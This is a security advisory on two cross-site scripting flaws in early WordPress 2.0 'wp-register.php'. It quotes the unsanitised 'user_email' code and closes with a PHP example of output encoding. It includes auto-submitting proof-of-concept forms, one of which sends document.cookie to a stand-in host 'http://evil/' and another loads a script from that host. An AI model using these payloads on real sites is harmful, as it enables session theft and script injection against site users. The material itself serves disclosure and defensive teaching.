2 vanilla XSS on Wordpress "wp-register.php"

2007.09.27
Credit: Adrian P
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

There are two vanilla XSS on 'wp-register.php'. Only early versions of the 2.0 branch are affected. Version 2.0 is vulnerable through the 'user_login' and 'user_email' parameters. Version 2.0.1 filters the 'user_login' parameter but is still vulnerable through the 'user_email' parameter (half-baked fix?). The XSS is only exploitable through a 'POST' request. WordPress 2.0.4 is not vulnerable, so I'm assuming anything after this is not vulnerable either (unless there is a comeback of course).

Note: user registration is disabled by default. Only sites with 'user registration' enabled are affected.

Lines 16 and 17 on version 2.0.1:

    $user_login = sanitize_user( $_POST['user_login'] );
    $user_email = $_POST['user_email'];

We can notice that 'user_login' is sanitized but 'user_email' is not, and it eventually gets printed without further filtering on line 114:

    <?php echo $user_email; ?>

I contacted the vendor and asked them if these issues had been fixed silently since I couldn't find them documented anywhere (even though they had been fixed from version 2.0.4 on). However, I got NO response from the vendor whatsoever.

Simple PoC:

    <html>
    <head></head>
    <body>
    <form method="post" action="http://target/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value='"><script>alert(1)</script>' />
    <input type="hidden" name="user_email" id="user_email" value='"><script>alert(2)</script>' />
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

This will pop up '1' and '2' on version 2.0, and only '2' on version 2.0.1.

Cookie theft PoC:

    <html>
    <head></head>
    <body>
    <form method="post" action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="anyusername" />
    <input type="hidden" name="user_email" id="user_email" value='"><script>eval(location.hash.substr(1))</script>' />
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>

Unrestricted script insertion from third-party site (we prove we can inject ANY JS):

    <html>
    <head></head>
    <body>
    <form method="post" action="http://victim/wordpress/wp-register.php" >
    <input type="hidden" name="action" value="register" />
    <input type="hidden" name="user_login" id="user_login" value="test" />
    <input type="hidden" name="user_email" id="user_email" value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>
    </form>
    <script>document.forms[0].submit()</script>
    </body>
    </html>
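The unfiltered echo of 'user_email' described above, next to a hardened form, as an added example in plain PHP (not WordPress code and not the vendor's 2.0.4 fix). It assumes the value is printed inside a double-quoted 'value' attribute, as the leading `">` of the PoC payload suggests; the function names are hypothetical.

```php
<?php
// Added example, not WordPress code. Uses only built-in PHP functions.

// Vulnerable pattern from the advisory: the raw POST value is echoed
// into the page. The surrounding <input> markup is an assumption.
function render_email_field_unsafe(string $user_email): string
{
    return '<input type="text" name="user_email" value="' . $user_email . '" />';
}

// Hardened output: encode for the HTML attribute context at the point
// of printing, so quotes and angle brackets cannot close the attribute.
function render_email_field_safe(string $user_email): string
{
    $encoded = htmlspecialchars($user_email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="user_email" value="' . $encoded . '" />';
}

// Input validation as a second layer: reject anything that is not
// syntactically an e-mail address before it is stored or re-displayed.
function is_valid_email(string $user_email): bool
{
    return filter_var($user_email, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed sample inputs: the advisory's alert(2) payload and a
// normal address.
$samples = ['"><script>alert(2)</script>', 'alice@example.org'];

foreach ($samples as $value) {
    printf("input:    %s\n", $value);
    printf("valid:    %s\n", is_valid_email($value) ? 'yes' : 'no');
    printf("unsafe:   %s\n", render_email_field_unsafe($value));
    printf("hardened: %s\n\n", render_email_field_safe($value));
}
```

Output encoding is the control that closes the hole; validation alone is the kind of partial fix the advisory criticises in 2.0.1, since every echoed parameter needs encoding regardless of what was filtered on input.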

